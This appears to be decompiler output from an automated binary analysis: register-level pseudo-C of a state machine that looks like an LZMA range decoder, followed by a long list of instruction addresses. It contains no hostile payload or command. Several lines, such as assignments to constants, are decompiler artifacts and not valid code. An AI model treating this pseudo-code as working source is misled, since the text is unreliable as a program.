								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                          0x00000000
                                          0x00406925
                                          0x00406925
                                          0x0040692a
                                          0x004069a1
                                          0x004069a8
                                          0x004069b2
                                          0x00406f91
                                          0x00406f91
                                          0x00406f94
                                          0x00406f94
                                          0x00406f9a
                                          0x00406fa0
                                          0x00406fa6
                                          0x00406fc0
                                          0x00406fc3
                                          0x00406fc9
                                          0x00406fd4
                                          0x00406fd6
                                          0x00406fa8
                                          0x00406fa8
                                          0x00406fb7
                                          0x00406fbb
                                          0x00406fbb
                                          0x00406fe0
                                          0x00407007
                                          0x00407007
                                          0x0040700d
                                          0x0040700d
                                          0x00000000
                                          0x00406fe2
                                          0x00406fe2
                                          0x00406fe6
                                          0x00407195
                                          0x00000000
                                          0x00407195
                                          0x00406ff2
                                          0x00406ff9
                                          0x00407001
                                          0x00407004
                                          0x00000000
                                          0x00407004
                                          0x0040692c
                                          0x0040692c
                                          0x00406930
                                          0x00406938
                                          0x0040693b
                                          0x0040693d
                                          0x00406940
                                          0x00406942
                                          0x00406947
                                          0x0040694a
                                          0x00406951
                                          0x00406958
                                          0x0040695b
                                          0x00406966
                                          0x0040696e
                                          0x0040696e
                                          0x00406968
                                          0x00406968
                                          0x00406968
                                          0x0040695d
                                          0x0040695d
                                          0x0040695d
                                          0x00406975
                                          0x00406993
                                          0x00406995
                                          0x00406b68
                                          0x00406b68
                                          0x00406b6b
                                          0x00406b6e
                                          0x00406b71
                                          0x00406b74
                                          0x00406b77
                                          0x00406b7a
                                          0x00406b7d
                                          0x00406b80
                                          0x00406b86
                                          0x00406b9e
                                          0x00406ba1
                                          0x00406ba4
                                          0x00406ba7
                                          0x00406ba7
                                          0x00406baa
                                          0x00406bb0
                                          0x00406b88
                                          0x00406b88
                                          0x00406b90
                                          0x00406b95
                                          0x00406b97
                                          0x00406b99
                                          0x00406b99
                                          0x00406bba
                                          0x00406bbd
                                          0x00406b60
                                          0x00406b66
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406bbf
                                          0x00406b3b
                                          0x00406b3f
                                          0x00407147
                                          0x00000000
                                          0x00407147
                                          0x00406b45
                                          0x00406b48
                                          0x00406b4b
                                          0x00406b4f
                                          0x00406b52
                                          0x00406b58
                                          0x00406b5a
                                          0x00406b5a
                                          0x00406b5d
                                          0x00000000
                                          0x00406b5d
                                          0x00406977
                                          0x00406977
                                          0x0040697a
                                          0x00406980
                                          0x00406982
                                          0x00406982
                                          0x00406985
                                          0x00406988
                                          0x0040698a
                                          0x0040698b
                                          0x0040698e
                                          0x004069fb
                                          0x004069fb
                                          0x004069ff
                                          0x00406a02
                                          0x00406a05
                                          0x00406a08
                                          0x00406a0b
                                          0x00406a0c
                                          0x00406a0f
                                          0x00406a11
                                          0x00406a17
                                          0x00406a1a
                                          0x00406a1d
                                          0x00406a20
                                          0x00406a23
                                          0x00406a29
                                          0x00406a45
                                          0x00406a48
                                          0x00406a4b
                                          0x00406a4e
                                          0x00406a55
                                          0x00406a5b
                                          0x00406a5f
                                          0x00406a2b
                                          0x00406a2b
                                          0x00406a2f
                                          0x00406a37
                                          0x00406a3c
                                          0x00406a3e
                                          0x00406a40
                                          0x00406a40
                                          0x00406a69
                                          0x00406a6c
                                          0x004069e3
                                          0x004069e3
                                          0x004069e9
                                          0x00406a9c
                                          0x00406aa2
                                          0x00000000
                                          0x00000000
                                          0x00406aa4
                                          0x00406aa7
                                          0x00406aaa
                                          0x00406aad
                                          0x00406ab0
                                          0x00406ab3
                                          0x00406ab6
                                          0x00406ab9
                                          0x00406abc
                                          0x00406ac2
                                          0x00406ada
                                          0x00406add
                                          0x00406ae0
                                          0x00406ae3
                                          0x00406ae3
                                          0x00406ae6
                                          0x00406aec
                                          0x00406ac4
                                          0x00406ac4
                                          0x00406acc
                                          0x00406ad1
                                          0x00406ad3
                                          0x00406ad5
                                          0x00406ad5
                                          0x00406af6
                                          0x00406af9
                                          0x00406a77
                                          0x00406a7b
                                          0x0040713b
                                          0x00000000
                                          0x0040713b
                                          0x00406a81
                                          0x00406a84
                                          0x00406a87
                                          0x00406a8b
                                          0x00406a8e
                                          0x00406a94
                                          0x00406a96
                                          0x00406a96
                                          0x00406a99
                                          0x00406a99
                                          0x00406af9
                                          0x00406b00
                                          0x00406b00
                                          0x00406b00
                                          0x00406b04
                                          0x00406b04
                                          0x00406b07
                                          0x00406b0a
                                          0x00406b0e
                                          0x00407153
                                          0x00000000
                                          0x00407153
                                          0x00406b14
                                          0x00406b17
                                          0x00406b1a
                                          0x00406b1d
                                          0x00406b20
                                          0x00406b23
                                          0x00406b26
                                          0x00406b28
                                          0x00406b2b
                                          0x00406b2e
                                          0x00406b31
                                          0x00406b33
                                          0x00406b33
                                          0x00406b33
                                          0x00406cd0
                                          0x00406cd0
                                          0x00406cd3
                                          0x00406cd3
                                          0x00000000
                                          0x00406cd3
                                          0x004069f5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406a72
                                          0x004069be
                                          0x004069c2
                                          0x0040712f
                                          0x004071ab
                                          0x004071b3
                                          0x004071ba
                                          0x004071bc
                                          0x004071c3
                                          0x004071c7
                                          0x004071c7
                                          0x004069c8
                                          0x004069cb
                                          0x004069ce
                                          0x004069d2
                                          0x004069d5
                                          0x004069db
                                          0x004069dd
                                          0x004069dd
                                          0x004069e0
                                          0x00000000
                                          0x004069e0
                                          0x00406a6c
                                          0x00406975
                                          0x004067a9
                                          0x004067a9
                                          0x004067b2
                                          0x004071c0
                                          0x004071c0
                                          0x00000000
                                          0x004071c0
                                          0x004067b8
                                          0x00000000
                                          0x004067c3
                                          0x00000000
                                          0x00000000
                                          0x004067cc
                                          0x004067cf
                                          0x004067d2
                                          0x004067d6
                                          0x00000000
                                          0x00000000
                                          0x004067dc
                                          0x004067df
                                          0x004067e1
                                          0x004067e2
                                          0x004067e5
                                          0x004067e7
                                          0x004067e8
                                          0x004067ea
                                          0x004067ed
                                          0x004067f2
                                          0x004067f7
                                          0x00406800
                                          0x00406813
                                          0x00406816
                                          0x00406822
                                          0x0040684a
                                          0x0040684c
                                          0x0040685a
                                          0x0040685a
                                          0x0040685e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040684e
                                          0x0040684e
                                          0x00406851
                                          0x00406852
                                          0x00406852
                                          0x00000000
                                          0x0040684e
                                          0x00406828
                                          0x0040682d
                                          0x0040682d
                                          0x00406836
                                          0x0040683e
                                          0x00406841
                                          0x00000000
                                          0x00406847
                                          0x00406847
                                          0x00000000
                                          0x00406847
                                          0x00000000
                                          0x00406864
                                          0x00406864
                                          0x00406868
                                          0x00407114
                                          0x00000000
                                          0x00407114
                                          0x00406871
                                          0x00406881
                                          0x00406884
                                          0x00406887
                                          0x00406887
                                          0x00406887
                                          0x0040688a
                                          0x0040688e
                                          0x00000000
                                          0x00000000
                                          0x00406890
                                          0x00406896
                                          0x004068c0
                                          0x004068c6
                                          0x004068cd
                                          0x00000000
                                          0x004068cd
                                          0x0040689c
                                          0x0040689f
                                          0x004068a4
                                          0x004068a4
                                          0x004068af
                                          0x004068b7
                                          0x004068ba
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004068ff
                                          0x00406905
                                          0x00406908
                                          0x00406915
                                          0x0040691d
                                          0x00000000
                                          0x00000000
                                          0x004068d4
                                          0x004068d4
                                          0x004068d8
                                          0x00407123
                                          0x00000000
                                          0x00407123
                                          0x004068e4
                                          0x004068ef
                                          0x004068ef
                                          0x004068ef
                                          0x004068f2
                                          0x004068f5
                                          0x004068f8
                                          0x004068fd
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406bc4
                                          0x00406bc8
                                          0x00406be6
                                          0x00406be9
                                          0x00406bf0
                                          0x00406bf3
                                          0x00406bf6
                                          0x00406bf9
                                          0x00406bfc
                                          0x00406bff
                                          0x00406c01
                                          0x00406c08
                                          0x00406c09
                                          0x00406c0b
                                          0x00406c0e
                                          0x00406c11
                                          0x00406c14
                                          0x00406c14
                                          0x00406c19
                                          0x00000000
                                          0x00406c19
                                          0x00406bca
                                          0x00406bcd
                                          0x00406bd0
                                          0x00406bda
                                          0x00000000
                                          0x00000000
                                          0x00406c2e
                                          0x00406c32
                                          0x00406c55
                                          0x00406c58
                                          0x00406c5b
                                          0x00406c65
                                          0x00406c34
                                          0x00406c34
                                          0x00406c37
                                          0x00406c3a
                                          0x00406c3d
                                          0x00406c4a
                                          0x00406c4d
                                          0x00406c4d
                                          0x00000000
                                          0x00000000
                                          0x00406c71
                                          0x00406c75
                                          0x00000000
                                          0x00000000
                                          0x00406c7b
                                          0x00406c7f
                                          0x00000000
                                          0x00000000
                                          0x00406c85
                                          0x00406c87
                                          0x00406c8b
                                          0x00406c8b
                                          0x00406c8e
                                          0x00406c92
                                          0x00000000
                                          0x00000000
                                          0x00406ce2
                                          0x00406ce6
                                          0x00406ced
                                          0x00406cf0
                                          0x00406cf3
                                          0x00406cfd
                                          0x00000000
                                          0x00406cfd
                                          0x00406ce8
                                          0x00000000
                                          0x00000000
                                          0x00406d09
                                          0x00406d0d
                                          0x00406d14
                                          0x00406d17
                                          0x00406d1a
                                          0x00406d0f
                                          0x00406d0f
                                          0x00406d0f
                                          0x00406d1d
                                          0x00406d20
                                          0x00406d23
                                          0x00406d23
                                          0x00406d26
                                          0x00406d29
                                          0x00406d2c
                                          0x00406d2c
                                          0x00406d2f
                                          0x00406d36
                                          0x00406d3b
                                          0x00000000
                                          0x00000000
                                          0x00406dc9
                                          0x00406dc9
                                          0x00406dcd
                                          0x0040716b
                                          0x00000000
                                          0x0040716b
                                          0x00406dd3
                                          0x00406dd6
                                          0x00406dd9
                                          0x00406ddd
                                          0x00406de0
                                          0x00406de6
                                          0x00406de8
                                          0x00406de8
                                          0x00406de8
                                          0x00406deb
                                          0x00406dee
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406e4c
                                          0x00406e4c
                                          0x00406e50
                                          0x00407177
                                          0x00000000
                                          0x00407177
                                          0x00406e56
                                          0x00406e59
                                          0x00406e5c
                                          0x00406e60
                                          0x00406e63
                                          0x00406e69
                                          0x00406e6b
                                          0x00406e6b
                                          0x00406e6b
                                          0x00406e6e
                                          0x00000000
                                          0x00000000
                                          0x00406c1c
                                          0x00406c1c
                                          0x00406c1f
                                          0x00000000
                                          0x00000000
                                          0x00406f5b
                                          0x00406f5f
                                          0x00406f81
                                          0x00406f84
                                          0x00406f8e
                                          0x00000000
                                          0x00406f8e
                                          0x00406f61
                                          0x00406f64
                                          0x00406f68
                                          0x00406f6b
                                          0x00406f6b
                                          0x00406f6e
                                          0x00000000
                                          0x00000000
                                          0x00407018
                                          0x0040701c
                                          0x0040703a
                                          0x0040703a
                                          0x0040703a
                                          0x00407041
                                          0x00407048
                                          0x0040704f
                                          0x0040704f
                                          0x00000000
                                          0x0040704f
                                          0x0040701e
                                          0x00407021
                                          0x00407024
                                          0x00407027
                                          0x0040702e
                                          0x00406f72
                                          0x00406f72
                                          0x00406f75
                                          0x00000000
                                          0x00000000
                                          0x00407109
                                          0x0040710c
                                          0x00000000
                                          0x00000000
                                          0x00406d43
                                          0x00406d45
                                          0x00406d4c
                                          0x00406d4d
                                          0x00406d4f
                                          0x00406d52
                                          0x00000000
                                          0x00000000
                                          0x00406d5a
                                          0x00406d5d
                                          0x00406d60
                                          0x00406d62
                                          0x00406d64
                                          0x00406d64
                                          0x00406d65
                                          0x00406d68
                                          0x00406d6f
                                          0x00406d72
                                          0x00406d80
                                          0x00000000
                                          0x00000000
                                          0x00407056
                                          0x00407056
                                          0x00407059
                                          0x00407060
                                          0x00000000
                                          0x00000000
                                          0x00407065
                                          0x00407065
                                          0x00407069
                                          0x004071a1
                                          0x00000000
                                          0x004071a1
                                          0x0040706f
                                          0x00407072
                                          0x00407075
                                          0x00407079
                                          0x0040707c
                                          0x00407082
                                          0x00407084
                                          0x00407084
                                          0x00407084
                                          0x00407087
                                          0x0040708a
                                          0x0040708a
                                          0x0040708a
                                          0x0040708a
                                          0x0040708d
                                          0x0040708d
                                          0x00407091
                                          0x004070f1
                                          0x004070f4
                                          0x004070f9
                                          0x004070fa
                                          0x004070fc
                                          0x004070fe
                                          0x00407101
                                          0x00000000
                                          0x00407101
                                          0x00407093
                                          0x00407099
                                          0x0040709c
                                          0x0040709f
                                          0x004070a2
                                          0x004070a5
                                          0x004070a8
                                          0x004070ab
                                          0x004070ae
                                          0x004070b1
                                          0x004070b4
                                          0x004070cd
                                          0x004070d0
                                          0x004070d3
                                          0x004070d6
                                          0x004070da
                                          0x004070dc
                                          0x004070dc
                                          0x004070dd
                                          0x004070e0
                                          0x004070b6
                                          0x004070b6
                                          0x004070be
                                          0x004070c3
                                          0x004070c5
                                          0x004070c8
                                          0x004070c8
                                          0x004070e3
                                          0x004070ea
                                          0x00000000
                                          0x004070ec
                                          0x00000000
                                          0x004070ec
                                          0x00000000
                                          0x00406d88
                                          0x00406d8b
                                          0x00406dc1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef4
                                          0x00406ef4
                                          0x00406ef7
                                          0x00406ef9
                                          0x00407183
                                          0x00000000
                                          0x00407183
                                          0x00406eff
                                          0x00406f02
                                          0x00000000
                                          0x00000000
                                          0x00406f08
                                          0x00406f0c
                                          0x00406f0f
                                          0x00406f0f
                                          0x00406f0f
                                          0x00000000
                                          0x00406f0f
                                          0x00406d8d
                                          0x00406d8f
                                          0x00406d91
                                          0x00406d93
                                          0x00406d96
                                          0x00406d97
                                          0x00406d99
                                          0x00406d9b
                                          0x00406d9e
                                          0x00406da1
